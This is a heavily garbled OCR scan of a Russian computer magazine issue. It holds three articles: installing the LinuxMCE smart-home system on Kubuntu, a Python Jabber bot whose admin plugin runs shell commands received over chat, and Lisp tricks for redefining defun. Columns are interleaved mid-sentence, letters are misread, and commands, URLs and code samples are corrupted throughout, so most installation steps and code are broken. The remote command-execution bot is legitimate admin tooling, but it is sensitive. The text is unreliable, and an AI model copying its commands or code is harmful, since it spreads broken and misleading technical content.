[либо РСТ-длата для аналоrовыхлиний СЛОТО8 расширения, чтобы подключить все уст Nokra770/7650/6620/N800/N81 O,IPAQ 221 0/5550/
а-ля DigiШТI TDM410P с МОдУлем расши ройства Также понадобится производительный hx241 о, Cisco 7970 [XML-Orbiterl и др. Интерфейс
рения РХО - Прим. ред. J, а такжесофтофон и eMKv.v. жесткий диск, хотя в качеСТ8е системы для подключенияновых устройствнаписа н на
IXlite, Bria, EkigaJ или IР-телефон. Некоторые хранения информации можно исnол ьзовать Ruby. Orbiter переведен на несколькоязы ков и
модел и телефонов позволя ютупра влять всем И выделенн ы й NA5-сервер. Соге предоставляет пордерживаетразличныеварианты оформле
настройками LinuxMCE со своего экрана. До все необходи мое для загрузки тонких !бездис ния. Русского в спискедоступныхязыков нет;
сгупна функция follow-me !«следуй за мной»I, ковыхl клиентов, которые затем используютс~ в впрочем, большая часть используемыхтерминов
обеспечивающаяавтоматическоеперена качестве Media Director' ов.
должна быть понятна и без перевода
правление вывода на различныеустройства, Media Olrector [или Media 5ta tlOпl- это обычный
к которы м подходитпол ьзователь, передвига компьютер, исполняющий роль медиа клиента, УСТАНОВКАLINUXMCE
ясь по помещениям. При выходе пользователя непосредственно выводящего видео на зкран Ориенти ровочные систем ные требован ия для
из зоны управления система переключается телевизора или музы ку В колонки. Его можно разных компонентов приведены в документе,
С Bluetooth на сотовую сеть IGPR5/WAPj, что использоватьтакже в качестведесктопа Ic расположенном по адресу wlkl.llnuxmce.oro/
позволяет контролироватьдом и управлять им Kubuntu!, персональноговидео рекордера IPVR]. rndex.pho/Hard\Naгe.Естественно,для Соге и
практически на любом расстоянии. домофона или для видеосвязи. Плюс на него Media Оiгесtогтребованияотличаются. Если не
ФункциональностьНТРС, в общем-то, возложена задача поуправлению и мониторингу предусмотрен захват и кодирование видеопо
стандартна - проигрывание медиаконтента за всем происход~щим в доме· предлагается со тока, то для Соге рекомендуемым минимумом
Iфильмы, «живое» или записанное ТВ, музыка, ответствующее зкранное меню, и подключаются является компьютер класса Репtium-11173З М Гц
интернет-радио, фотки] с разных источни устройства управлений. Как правило, такие сис с 256 Мб RAM и 4 Гб хардом Iнепонятно почему,
ков, сохранение файлов на диск, управле темы не нужда ются в жестком диске и загружают у меня после установки всегда съедалось не
и в, при нято реш е н ие с верс и И 081 О iпла н и ру Соге-сервер может быть «чистым" или гибрид пользовать с LiпuхМСЕ платы от NVidia lGeForce
ется полностью решить все проблемы, связан ным IHybrid), то есть быть еще и Media Оiгесtог'ом. 6200 - GeFoгce 8500J. Список TV-тюнеР08 и
ные с переходом на новый КОЕ) мигрировать Hybrid - наверное, самый простой вариант карт захвата ты найдешь по ссылке 'В том числе
на годовой цикл 8ыхода дистрибутива. использования всей системы. поддерживаютс~ и устройства, подкл ючаемые
Графический интерфейс управлен ия Media noU5BJ.
СТРУКТУРА Diгесtог'ом и всеми устройствами «умного дома» Стабильная на момент написани~ этих
SMART НОМЕ НА LINUXMCE получил название Orblter. Он бывает нескольких строк версия 071 О распространяется для
Прежде, чем приступить кболее подробному 8идов:универсальный С веб-интерфейсом, поз 32- и 64-битныхредакций Kubuntu 7.10 (Gutsy
обзору возможностейдистрибутива. позна воляющий управлять системой с любого КОМ па; GrЬЬоп]. Вдальнейшем будем рассматривать
комимся со специальнымитермина ми, - он и мобильный, представляющий собой телефон Iс установку и настройку именно этого релиза.
помогут понять принципы' на которых построен устаН08ленной SуmЫап или Microsoft Mobile) и Кстати, в конце марта I1стек срок поддержки
LlnuxMCE. Сердцем и одновременно мозгом пордерживающий нужные функции , ПК или КП К, десктопных версий 'Ubuntu 7.1 О, позтому
всей системы является выделенный (и единст подключенные через WiFi. Кроме того, в состав обновлений к ним уже не предвидится.
венный в сетиJ сервер Соге. На нем собственно Media Oirector'a входит«экранный»орбитер, На странице загрузки можно выбратьодин из
и работают сервисы, предоста8ляемыезти м позволяющийулучшитьуправлениепри помощи двух 8ариаНТ08 уста нов очного образа. Если уже
ХАКЕР 06 /126/ 09
У,СТАНОВКА
DVD-ВЕРСИИ
~ info
DОyo;Juа;И"''1IПIIОU51J~tм5со .... lоao:tЭ$3n>i1di~pI'''i''r7
называем LiпuхМСЕ
дистрибутивом, хотя
на самом деле это ВО ВРЕМЯ УСТАНОВКИСЛЕДУЕТ ВЫБРАТЬ РАЗДЕЛ
свободное дополне РЕЖИМ CORE ИЛИ HYBRID
ние кдистрибутиву По умолчаниЮllpи использовании DVD инсталлятор
Kubuntu. забираетхард IЩIIНОСThЮ> nопyrнозатирал всю инфу.
Но есП> один трюк, позволяющий поставить DVD-Bep
• Основой системы «В КАЧЕСТВЕ КАМЕР НА сию в отдельный раздел. Идея проста: нужно за(.'Тавить
автоматизации уcrаНОВlЦИкnоверить, что система уже есть, а значит,
в LinuxMCE является БЛЮДЕНИЯ ЛУЧШЕ ВСЕГО ее нужно просто оБНОВИTh. д.'IЯ этоro в отдельном
Pluto (Q\!J.tQhome разделе (лучше, чтобы это был /dev/sdal), отформа
сот). Его код относи ПОДХОДЯТ IP-КАМЕРbI». тированномв одну из файловыхсистемLiпuх, создаем
тельно недавно стал KaTa~oг/etc, ав ием-nyстойфаЙJIp]uto.conf. Во время
доступен под GPL, устанОВКИ:llpограмманаходит / еtс/р!utо.сопfи пред
хоп\ готовые реше естьдискс КuЬuпtu 7.10, можно остановиться на двух СО лагает обновить имеющуюся систему.
ния распространяют дисках, обозначенных соответственно LiпuхМСЕ-СОl-IЗ86
ся под коммерческой rc2.iso и LlпuхМСЕ-СО2-i386-гс2.isо [для 64-битных систем 8
лицензией. имени будет п рисугствовап> amd64J. Они содержат пакеты для режиме будет работать наш сервер - НуЬпd [выбираем
конвертации системы в LinuxMCE. Здесь есть один нюанс YesJ или Соге (No, отказываемся от проигрыватеЛ51J. Если
• Основная фило это должна быть «свежая» система без ка ких-либо апдейтов на компьютере будет обнаружена видеокарта от NYidla,
софия LiпuхМСЕ [кстати, от интернета на время установки лучше отключиться, мастер предложитустановить проприетарные драйвера
выражена в девизе чтобы операционка чего не вытянула). Иrlаче инсталлятор [из интернета или с СО 11. Отказываться от этой процеду
проекта: «Ifyou're LlnuxMCE может выдать ошибку и завершить работу. ры не стоит. Далее система пробует настроить сетевые
uSlng а Media Center Для «чистой» установки предназначен ОУО-диск Доступны интерфейсы при помощи ОНСР При желании выбираем
РС, It'S all about the два варианта - обычный 3,9 Гб и Oual Layer-7,0 Гб. Второй «No, i'll set ту пеtwогk optrons mапuаlLу» и устанавли
media, stupid, поt the содержитдемо-видеохорошего качества. Надо сказать, ваем настройки вручную. Затем указываем зеркало, с
РС». польза отнего невелика, поэтому смысла качать не вижу. которого будет производиться обновление [в списке есть
ОУО устанавливаетсяне просто, а очень просто: достаточно и российское]. Поумолчанию на сервере стартует ОНСР
• При запущенном выбратьжесткийдиск и ввести парольдляпользователя сервис, раздающий IP-аАреса в диапазоне ·192.168 80.1
LlпuхМСЕдля пере linuxmce, который будет использоваться для доступа по 55Н. 192 168.80.254. Можно изменить эти настройки. Напри
хода в Kubuntu нажи После чего все необходимые файлы скопируются нахард. В мер, если LinuxMCE будет единственнымхостом, тогда В
маем <Ctrl+Alt+F7> этом варианте будет использован весьдиск, данные на ко ОНСР нет необходимости.Теперь следует определиться
и <Ctrl+Alt+F11 > для тором уничтожатся. Вариант мультизагрузки изначально не стем, как будет использоватьсякомпьютер. При помощи
возвращения обрат предусмотрен; правда, инсталляторлегкообмануть !смотри переключателя выбираем один из двух предложенных
но в LlпuхМСЕ. врезку). вариантов.
• 25 ма рта 2009 года образы на диск необязательно. Ставим Kubuntu 7.10. затем Kubuntu, но можно переключиться в LinuxMCE:
завершена подде монтируем С01 из LlnuxMCE в каталог /mnt: • Adedlcated LinuxMCE - наоборот.
$ sudo mount Lil1\D:ИСЕ-СDl-iЗ86-rс2.iso /mnt -о loop пьютере, выполняющем роль Media Oirector·a и обычного
исходного кода и -устанавливаемнаходящийсявнутри пакет тсе На зтом все. Теперь мастер попроситуказать. где нахо
LiпuхМСЕ выполни iпstаllег, дится СО 1/С02 и установочный Kubuntu 7.1 О Oesktop
кома нду «svn со Са м ый удобны й вариант - задать расположе н ие на харде
httр://svп .ll Пllхmсе. $ sudo dpkg -i /rmt/mce-il1staller_2. О .1-1_iЗ86 .д.еЬ соответствующих 150-0бразов, тогда можно начать процесс
соm/рlutо/tгuпk/ установки. оставить компьютер и заняться своими делами.
linuxmce» После этого на рабочем столе появится значок «Iпstаll Если выбрать "It's in СО Drive», придется последовательно
LlnuxMCE". Чтобы начать процесс установки, просто щел вставлять каждый диск в при вод. В Гlроцессе установки мо
• Обзор Myth ТУ читай каем по нему Да, во время установки будут перезаписаны гут появляться сообщения об ошибках, обычно они возника
в статье «Строим до некоторые системныефайлы. Всякое бывает. поэтому на ют при тестировании драйверов к различным устройствам,
машнюю медиастан «боевой» системе лучше не зкспериментировать. Если установка не закончена с Еггог. то на них обращать
цию» В июльском Установка выполнена в виде нелокализованногопоша внимание не стоит. на результат работы они не влияют По
номере журнала за гового мастера. В первом окне получаем сообщение о окончании будет запрошена перезагрузка.
2007 год. том. что обновление будет произво.циться из репозитария
LiпuхМСЕ [в Hel-l содержатся все необходимые пакетыl, НАСТРОЙКИ ПОСЛЕ ПЕРЕЗАГРУЗКИ
а не Ubuntu. Наэначениевторого шага, предлагаю Первая загрузка несколько затянется, поскольку будут
щего установить медиапроигрыватель.путает многих проверяться И дона страиваться все сервисы. Далее
На самом .целе здесь предстоит определиться, в каком запустится мастер настройки ау.цио и видео - «АУ
Q Q. Q. Q 0: D G[hitP;1J12~_~~o.i~~to~dmlnti~:!~~~~_._ ...
~! ;;uпu.:чСЕ
Ba.slclnto -
! -
W!.lold
-- -
AdV/lП«11
- Att10П11111<111
--SClI;UI
GRAPHICAL А5РЕСТ
~ STEP 2
\ШI1 'TolccolII
!1=
~ ~t ~y~ . . . . ~Ii<iQC.•. ri>+ Alph~ bl4n.JadUli,tHItI.<.
Devlc4i!5 But bt'ibt. (/'м:IO~"""t r(!~1'IO'" t~ w«l:s.;,nO tN P-4tJ'"~"",nt.,
~t ~.Itр:llp6utolIQП'I',"Q""....цt.n,j.~.рhp,\J1
о,"",
llilI.<Ш
~ Wlzard I LlghUng Scenarlos
~
Q!I<IW
МАСТЕР HOUSE SEТUP l.!9t!!>
!d:IJЫIO
N(){e: Tne nrst Ilghting scenario 1.. Ih.:: "Dеt3Шt Otl' 'аг th<Jt гоот, mеЗпing
lightingtaItO'N-У'1u, v.rn:n you еntег the room,lttattir1>1 sселзrjo-МII ое ex~
~
OFF' v.t1~n уоч leave tne room. YOU SnOuld make ~ l'irи sce:natio tum о
second $сепаriO tumtnem ort. The restot the sc!!:гI3r1os сзп O~ aпylI\ing
Su!W~lance Саmегщ
СКОНФИГУРИРОВАТЬ
ПОДКЛЮЧЕННЫЕ УСТ '"""'"
ВJJшtl!!Jtl
GCDetlcserla!QrY!(~
ЕI99ш!зпWtzзrl1
Bzthroom
Aut:ag~e(<lted scenar1os: N/A
ПОСЛЕУСТАНОВКИLINUXMCE
ВЕБ-КОНСОЛЬ УПРАВЛЕНИЯ LINUXMCE ЗАПУСТИТСЯ A!VWIZARD
ADMIN WEBSIТE
на девять шагов. На настройки рабочего стола Kubuntu пасности, параметры VolP-провайдераи РVR-систему сайт LlnuxMCE
зти установки никак l-1e влияют. - они действуют только (MythTV или VOR). Если некоторых устройств в системе lli1JlZ.D:!.<;.§.J:!J.
для LiпuхМСЕ. 8 последующем мастер можно запус нет, нажимаем «Contlnue without опе». Мастер укажет
тить повторно из меню LinuxMCE, выбрав Аdvапсеd ЛОГИI-1 и пароль для регистрации и получения готовой • Интерl-1ет-проект
- A!V Wlzard (или в ко маl-1ДНОЙ строке /u sr/plu to/bin/ почты. Теперь в Media РlауегWizагdдля каждой комнаты «УМI-1ЫЙ дом своими
AVWizard_Run.shl. Вl-1ачале при помощи трех окон указываем СIlИСОКУСТРОЙСТВ и методы управлеl-1Иfl ими, руками» - hosm.ru.
выбираем видеОИl-1терфейс[VGA. OVI/HDMI. S-Video На nослеДl-1ем шаге МОЖl-10 устаl-10ВИТЬ ряд программ
и такдалееl, разрешеl-1ие и частоту развертки. После Iw32codecs, OVO С55 и другиеl. Если ПДУ дЛЯ какого-то
проверки правильностизтих установокбудет запрошен устройства отсутствует, нажимаем «Ооп'! сопtгоl ту ... »
выбор одного из трех вариантов Orbiter User Interface И идеl~ дальше В процессе выбора устройств будут уста
IUI). Самый простой - "Static images, по overlay l-1авливаться все необходимые драйвера, при этом окно
(tlghtweightl" - не требователеl-1 к производителы-1стии сообщеl-1ИЙ будет чуть перекрывать рабочее поле мастера
видеоподсистемы и будет работать на всех платформах. [не очень УДОбноl. По окончан и и щел каем «Start using ~ warning
Наиболее ПРОДВИI-1УТЫЙ - «OpenGL with alpha blепdiпg the system». Для перехода в КuЬuпtu используем ссылку При установке DVO
!high-endl» - потребует NVidia 6/7/8/9ххх с l-1e Mel-1ee 128 «КОЕ Oesktop» или нажимаем <Ctrl+Alt+F7>; если НУЖl-10 варианта LinuxMCE
Мб ОЗУ. После выбора одного из режимов с поддер вернуться обратно в LiпuхМСЕ - <Ctrt+Alt+F11 >. все данн ые на
жкой OpenGL нужно протестировать работу нажатием После установки доступен LiпuхМСЕ Admin Webslte, КОТО жестком диске будут
кнопки "Test". На шаге «Adjust Image 5ize" указываем PbIl~ можно открыть, обратившись по адресу http://core ip/ ун ичтожены, мулыи
правильный размер изображения. Выбираем разъем, к pluto-adrnin или l-1ажав кнопку В Launch Manager. Отсюда загрузка систе"" не
которому подключены аУДИОКОЛОI-1КИ, и тестируем вывод можно произвести все настройки. о которых говорилось предусмотрена.
звука а обычном режиме, в Dolby и ОТ5 IOigital Theater ранее, и по ссылке l-1a первой странице скачать орбитеры
50uпd] - послеДl-1ие два будут достуПI-1Ы в зависимости для Windows и 1-1 eКOTopbl е другие утилиты.
от выбраl-1НОГО аудиоразъема. Попутно выставляем
used as а РС". загрузится КОЕ, на рабочем столе которого последующей зксплуатации, то ol-1a не вызовет проблем
будет расположена иконка для запуска LinuxMCE Lаuпсh даже у чайника - выбирай устройство да l-1ажимай
>> cod;ng
~
+++
.+++
I НТТР:/ГТUТА'МС.СОМ I
"+++
.+++
----
-+++
---~
.+++
~
РОБОТ ~ а СХЕМДРДБОТЫДЖДББЕРД
IIH++
-+++
,ЛЯ
.+++
-+++ Еще бы, ведь это он спасет в экстремальной ситуации, когда под рукой
нет putty, зато есть джаббер-клиент [ты ведь уже завязал с аськой,
-+ ++ правда?].
Пришлотепло,а вместе С НИМ - " выезды на ноута/субноутанемысл"моll,но я оказался не от РегL·а. разв"тие которого де-факто пре
.+++ природус шашлыками.И пока я смотрел на таков, и на зтом п"кн"кдля меня закончился. кращено) системный 'В отличие от вебовского
костер, предвкушая начало отдыха, зазво Вечером я вспомнил, что на телефоне у меня РНР) скр"птовый язык программирования.
н"л телефон (в соответстви"с пр"каэаМ!-1 он установленджаббер-месенджер,и, если бы на Выбор протокола сделать еще проще, ведь
должен быть при каждом сотруднике мили серваке присутствовалсоответствующийбот, у джаббера в этом плане нет конкурентов
1'1-+++ ци" на случай 'гревог" "л" команды «сбор»I. который могбы исполнять его команды, летний аська не подходит ввиду отсутствия на'ГИВ
3вон"л полковн"к,срочно вызывающийменя отдых бы не обломался. «Н"когда не поздно нога шифрования И цеНТРдлизованности lих
на работу и требующий выдать ему на серваке начать», - сказал себе я и принялся за работу. сервак может лежать или капиталистическое
новый пароль. Работы на пару минут, но где же начальство опять начнет что-то мутить со
+++ я в лесу достану комп с "нетом? Матерый гик PYTHON &JABBER сменой протокола].
портативнуюЭВМ себе, наверняка, найдети Почему Python? А потому, что зеленый змий Юзать на Питоне джаббер-протокол мож
там (пить, гулять" морально разлагатьсябез - единственный развивающ"йся [в отличие нодвумя способами: простым и сложным.
ния пара метров мы используем две функции загруженного конфига. Создание главного
оттуда. Первая, read - для чтения конфигура объекта bot проиэводится 01" xmpp.Client с пере
ционного файла. и,~я которого передается как дачей домена, на котором находится юзер, и
параметр. Вторая функция, get, нужна, чтобы пустым списко,~, чтобы на экран не выводилась
достать какой-то параметр. Она принимает в отладочная информация [тру-хакеры работают
качестве параметров секцию и имя параметра. только методом научноготыкаl.
Рассмотри,~ зтуфункцию:
(jabberpy.sourceforge.net) ;
цию:
• Х11\рррру
rеtщ:n ( '10gin' : lоgiп,
(xmpppy.sourceforge.net} .
'password ' :password, bot.. соппесс ( )
С истема у нас будет состоять из бота [Ьо t. Теперь в цикле необходимо вызвать bot.
ру), файла конфигурации [сопflg.iпiJ, папки с Process[1), который принимает входящие
плагинами Ipluginsj и библиотеки хтррру. Бот
будет иметь два типа плагинов. Представи
тели первой группы доступны всем, второй
лишь избранным, по списку или паролю.
ССЫЛКИ
ПОД,РОБН'ЕЕ ULIE
НАОБЪЕКТЫ
охмРРРу ,
\
И ПЕРЕМЕН'НЫЕ
Библиотека хтррру содержит мпого полезных объектов,
\11
в Питоне (да и в другихязыках, например,в РНР) , есть один
Рассмотрим некоторые из них.
.'
юоанс, про который часто забывают_ Рассмотрим прнмер раБоты Объект JID ДЦЯработыс Jabber т. При создапиипринимает
сперемеииыми: параметр-JаЬЬеr-идеитификатор.
Методы:
a~1;b=a;b=2
• gеrDоmaiп, возвращает домен;
ргiпt а #1
• getNode, возвращаем имя пользователя;
print Ь #2
• getResource, возвращает ресурс.
Ои выведетна экран 1, потом 2, и это закономерно. А что, если главный объект Client. При созданиипринимаетдомеп
перемен.иая будет в объекте? Посмотрим: джаббер-сервераи перемеинуюДJIЯ отладочнойинформации,
Методы:
class Obj () :
• сопnесt, подключеиие к серверу;
def _init_(self) :
• auth, авторизация,припимаетпараметры: имя пользователяИ
pass
пароль;
-+++
ПIРОЦЕДУРАОБРА'БОТК~
--+++ ВХОДЯЩИХСООБЩЕНИИ
return
iFЕсли юзер не адиин - говорим «команды нет).)
"'Г+++
liесли команда в списке nyбличных - запускаем #Если ::<;.оманда есть в «админских»
I
I
~
U1.Л:
\
.. I><,.. ,.:.н.,
.~~
\
··(..·,.".1'·"
\
\
'lI-! i
.
.........,.....~ .;.",...... <;~~,; ь..-
l
-1 I
:~ rr~~~ i§;~:;i:~::'[!:,T:7:~::, Ё@
'~.E
! .. о
i O'REILLY' еУР080ЕПИТОН08еКОЕЛОГО
КНИГА ПО ДЖАББЕРУ NET8EANS - ОТЛИЧНАЯ IDE
ДЛЯ PYTHON
лучаем доступ к объеК1у нашего бота. Далее идет обработка которые будутсодержать реестр загруженного.В первом
входящего сообщения, где с помощью команды mess. (public_commands) будут nеречисленыте плагины, которые
getBodYMbI получаем сообщение. Если входящее сообщение можно запуститьбез авториэации.а во втором Icommandsl ~ dvd
равно None. это означает, что пришла служебная команда - элитные (тру. VIP] - админсхие плагины. В качестве ре • На диске ты
(допустим. про то, что юзер что-то нам печатает). Такие со зультата работы функция вернет нам ассоциативный массив найдешь полные ис
общения мы обрабатывать не настроены, и реакция на них с nлагинами и списками: ходники бота.
однозначна - выход изфункции.
В следующей части Марлезонского балета мы воспользу def 10adPlugins():
• Видео. иллюстриру
емся методом send, отправив в отее1' простое сообщение. import ОБ
ющее работу с ботом.
Этот метод в качестве параметра принимает объект Message commands = []
ждет тебя та м же
библиотеки хтррру. При ее создании мы передаем два пара public_commands = []
на нашем DVD
метра' первый - кому нужно отправить сообщения, а
плагин будет иметь название. аналогичное исполняемой tfЕслJ.1 и.ня файла не '_init__
1
им команде. К примеру, если мы хотим создать nлагин, i Е plugin_name ! = '_ini t_· :
который на команду «echo some text» посылает сообщение
с зтим же текстом, то плагин должен будет называться echo :#Загружаен nлаrи..i-f в :1ереыенную
+++
>> ,::oding
INTERNET
,
MONTAGUE
.NET
ОБРАБОТКАСООБЩЕНИЙ
F::-~
,-+++
'Р1.1Ы iс_сопunапds' :publ iс_соmшапds «админских»
-+++
НЕТ, ЭТО СЛИШКОМ просто. ИСПОЛНЕНИЕ КОМАНД
Ну, вот и настало время закодить «виновника торжества» - плаГИfi, ис
УСЛОЖНИМ ВСЕ И НАПИШЕМ полняющий системные команды. Наречен он будет говорящим именем
1+++ АДМИНИСТРИРОВАНИЯ».
Вот как это выглядит в строках сурового программного кода:
imporl. хтрр
Эта фУfiКЦИЯ важна длй пони мания работы Питона в плаfiе загрузки import 08
тевв . getBcdy ( )
В вышеуказаfiНОЙ фУfiКЦИИ загрузки мы запускаем для каждого из ста = сщd[4:]
них фУfiКЦИЮ mit_ В зависимости от результата имя плагина добав
,-+ ++ лйем или В список РUЫIC_соmmапds, или в commands. НаписаfiНУЮ o1.1tp1.1t = ОВ.рореп(стСО .read()
загрузку плагинов можно заюзать И при этом записатьрезультатв соот
plugin = getattr (bot. pl1.\gins [ 'plugins' ) ,cornr'1and) ничеНfiОГО расширения функционала при помощи плаГИНО8.
» c:oding
LINKFlY
/ HYТPr!lL'NKFLY.RU /
+++
ИЗСЕТИ для символьных вычислений, а значит, для лить во время выполнения программы. Да,
«Адепты Лиспа - головная больлюдей в разработки экспертных систем и других именно так: программа может быть сгенери
+++ белых халатах?" Подобный вопрос порой за АI-приложений Разумеется, для разработки рована во время выполнения l Кроме того, ты
даютте, кому приходилось с ними [адептами) аеб-приложениЙ.приложениЙ,взаимо можешь переопределить уже определенные
контактировать. Вот, например, высказывание действующих с базами данных, и прочего функции, то есть, язык позволяет писать
одного из модераторов форума известного общественно-полезногостаффа он также самоизменяемые программы без исполь
+++ ресурса Illlp:lirsdn.ru: «Функциональные используется. зования ассемблера. Все эти манипуляции
языки в целом и Лисп в частности собрали Одно из многих положительных качеств Лиспа можно производить и В «докомпиляционной"
вокругсебя много откровенноневыдержанной - его максимально аскетичный синтаксис. стадии, что очень способствует построению
и фанатичной публики». Чтож. приобщимся к Два основных правила таковы: оптимизированных программ. Для более
ТЕОРИЯ. СКАЖИ «НЕТ» Например: Iтвоя_программа параметр'l лучших ресурсов по основам Лиспа: b.11QJ!.
СИНТАКСИIЧЕСКОМУ параметр2 .. параметрNJ. pcl.catap.ru, там находится переведенная на
РАЗВРАТУ! 2. На месте пара метра может быть вызов
русский язык книга "ПрактическийСогnmоп
Сразууточню,что под термином «Лисп» В другой функции, и ее результат будет счи
Lisp" Питера Сейбеля.
статье подразумеваетсядиалект«Согnrnоп таться параметром: (твоя_программа (+ 12)
+++ нии осталисьтолько эти два диалекта. циональных объектов В качестве параме татора на "vvvw.lisgWDгks.соrn/dО\ЛlПlоаds.
Итак, что же зто за эверь - Lisp? Это язык тров функции ты можешь передавать другие Чтоты говоришь? Не желаешь пользоваться
общего назначения, особенно удобный функции, которые, кстати, возможно опреде «простенькой системой»? Желаешь иметь
» coding
Обе системы ставятся на Windows, Linux, ПЕРЕОСМЫСЛЕНИЯ какую-либо рекурсивную функцию. В качестве
MacOS, FreeBSD [оцени масштабы). Повоз примера у нас выступитфункция вычисления
ившись с бесплатными версиями, тебе нужно ЖИЗНЕННОГО ПУТИ факториала:
панику [а лишь ощути серьезность и мощь от ДАО, НО ВСЕ-ТАКИ не СТОИТ заниматься подсчетом
раздобыть nлагин для Eclipse, включающий сколько основательно разработчики подошли (factoria1 5) ; про верка
в себя Лисп-систему SBCL, под названи к вопросу переносимости. Вот, например, > 120
а вообще, какую-либофункциональность, ,
ли? Ноучти, что под неистребимый Windows определеннуюранее и связанную с каким
ДЕСЯТЬ
портированиееще не завершено [причем,
только под архитектурух861. Главное, чего
либо символом, Зачем? ЭТО во многом зависит
от нашей фантазии, Сможем найти смысл в
I
возможности переназначатьфункциональный
РЕЦЕПТОВ
пока нет в Wlпdоws-версии, - многопоточно
сти. Все остальное должно работать на «ура», объект, эначит, будем использовать;если нет,
- ну значит не судьба,
ЭЛИI<СИРА
хотя я, помнится, так и не смог побороть глюк
библиотеки ASDF-INSTALL, предназначен И все-таки, чем бы нам это могло помочь?
ВЕЧНОЙ
ной для загрузки и компиляции библиотек из Допустим, у нас есть чужой код, в который нет
общего хранилища Лисп-исходников [смотри времени/желания влезать, но скорректиро
МОЛОДОСТИ
http://cliki netJ, вать его работу нужно, просто позареэ. Мы
Итак, SBCL - это Лисп-система [не среда можем осуществить это следующим образом:
разработкиl, и для экспериментов с Соmmоп 1, Ввести в систему новый символ kкажем, 'ВI
ЛИСПА Lisp' ом ее может быть вполне достаточно. и сохранить в нем фун кциональный объект,
Для серьезных разработокя тебе рекомендую связанный с неким символом kкажем, 'А) и
L Единообразный и простой синтаксис
добыть модуль к редактору Emacs - SLIME, поведение которого требуется скорректиро
2.... Макросы вреivlени компиляции на комбинация - это «EMACS - SLIME - SBCL» 2. Определить новую функцию, которая осу
самом Лиспе, SLIME можно взять отсюда: httр:l/соmmоп ществляет какие-либо нужные нам действия,
ций во время выполнения, сразу, то можешьскачать один из вариантов объекта [связанного с А а теперь еще и с
рированногов run-time,
lispbox или здесь: http:Ugigamol1keys.com/ объекта (этого самого - связанного с 'А и .8).
библиотек (http://cliki,net).
ФУНКЦИИ ЛИСПА 3.Связатьфункционалы~ыЙ объект, пред
система (CLOS),
консоль интерпретатора. Например, в случае функции И нужно было польэоваться новым
программирования,
10, Декларативноеописаниециклических Да, именно сюда тебе и следует вводить вы ;Определяем функцию ОТ двух аргу
нает UNIX Shell: вводи выражения, нажимай (defun re1ation-is (obj1 obj2)
ХАКЕР 06 /126/ 09
++
::-::- c:oding
+++
."'~... ~. - .. ,'k.'.-.. I~·"" _ ,.,....., '0"0'" ,..;.
- ~ ~.-~~~~-: ~~~=~~!
18:1~! ~~ i-:~С:~:::r~.;--~~-~·~~~~~~~~5fЗ_~~_!:_~_~_
~+++
1~ ~ !!:rJ:~~::1::;::~~:;~-~~::::3:~
"1Щii.Оli
r=~-=J
*MIS1
!
:,'
~;::
l!yltt- .~;
!~: ~ --I·f----·- ~j}
~::""oe ...
!_
..-I I~r
]:..с '!!.~!!!!III!!~!j~~
.. МIЫ\I1r~LET. НF~jI;tt-,. HIL)
:.
:~
~ ...
..---;,~~:' II (0IИ_
(rIHO-УlItDDV :lpE~C"lL'HIJ*'OIl).)
• 1""' .::
I=.c.. 1~' (Ш «~=i~\I'lI>olt
I
~=-. :,nVII ~fDJl:tI1 11'1N:"frft.oq1.113.1:.15
I C:\O'oC.,,,,,,t.. ~nll Slttt1nSl"'''Jnkl'll_'tto'' I~II
~I<I\,. :0""
j~~_:~~:1IЮ ~~:, tlng.. : 1I1'lt,jII 1. 'plq 1, "P'.~ 1, 40\<!I 1:.
~I
,. .~(Рош.
I
Попробуем то же самое провернуть с рекурсивной функцv,ей, в нашем
+++
Как мы видим, при манипулироsании рекурсивными функциями таким (dеfшасго defun-new (name args &body body)
образон возникает проблема. Это происходит из-за того, что при (let (*this*) ;это нужно для создания замыкания
sыполнении изначальной функции В ее недрах происходит не sызоs (defun ,name ,args ,@body)
+++ саной себя, а вызов новой функцv,и, добавляющей функциональности к jнодифицируем заныкаеиое значение
Ненного подумаем. Нам нужно успешно вызвать в функции саму себя, ; возэращаем символ определенной ф-l1А
причем не функцию, сsязанную С каким-либо символом [так как может • ,name» ;dеfшасго
ально SЫПОЛI~ЯЮЩУЮСЯ в данный момент. Сразу напрашивается вопрос (defun-new f (х) (list х *this*»
- а не предоставляет ли язык нам такую возможность? Какую-нибудь (f 34)
системную переменную ероде 'this', содержащуютекущий, выполняе > (34 #<interpreted function F 200О8832»
(defun factorial(x)
(шасrоехрапd ' (defun-new f (х) (list х *this*)))
т++ (Н (zerop х)
> (LET (*THIS*)
1
(DEFUN F (Х) (L1ST Х *TНIS*)
(symbol-functi.on 'factorial)
(defun factori.al (х)
(let ({new-factorial
•....' .... ·.J~I (_r."'_U"
, . . . . ( .... <Т ... ' . . ~tl.. ''''''_1) (symbol-function 'factorial»)
"'. ,- "1' =., M~'
I
'M'~'"
'(Jtt\.tII""•• (setf (symbol-function 'factorial) • Всемирная ассо
(......,.."•••_ , ...:r .
!~;;IIoI •• (чllll-.l·'" '{_·,.... ""Н
( ..... "аН1НI а -t~1~.)) (symbol-function 'old-factorial» циация пользова
(,
'~.H
~)
(QUOTE Р) ) ;defun
common-lisp.nel.
(Eactoria.l 5) ;проверка
2)Далее создается функция с помощью стандартной 'THIS" ДЛЯ этого мы напишем код, подобный определе
формы DEFUN, в теле которой может использоваТЬС>1за нию DEFUN-NEW. но с некоторыми коррективами:
мыкаемое значение локальной переменной "THIS'.
3) Форма (SETQ *THIS' [SYMBOL-FUNCTIQN [QUOTE FJI) ;Сохраняеи текущее значение системной функции
мощью DEFUN функции. Причем изменяет она его со зна (rnacro-function 'defun) обходимый стаффты
чения NIL на значение, равное функциональному объекту, ; Переопределяем систе.мную функцию DEFUN, ис найдешь на нашем
соответствующему тол ько что определенной функции. пользуя ее старую версию в DEFUN-OLD пацанском диске.
ния функций (через DEFUN-NEWI, учитывающий появле ; Восстанавливаем прежнее значение, если в но
ние замыкаемой переменной *THI5' в теле функции, вовсе вой DEFUN больше нет необходимости
не обязательно.НО дело в том, что для пере~енной"ТН 15" (setf (rnacro-function 'defun)
применеНИS1'ТНI5', но вот для чего его применить не вопросом, - смотри незагреми в компанию к Наполеону с
созданным кем-то фУf1кциям 1 Либо из-за отсутствия исход На зтом примере мы стобой осознали одну важную вещь:
ность в r'un-time.
это еще одна причина Бессмертия Лиспа.
Далее ~ покажу тебе, как обойтись без 'ТН 15' при до
Вот код, который следует использоватьдля «апгрейда»уже к сожалению, много чего осталось за рамками статьи: и
ХАКЕР 06 {1261 О.
[23]
>> ,:;.()d'r\,-;\
,~~
'"",,ЕR,,",П
"/~ ~
I _
ДЕНИС БОНДАРЕВ
I AST~RGANST~R"'GMAIL.COM I
"
'~
1+++
~.~ спдм 1.
++ . 'ТАЦЕНТР
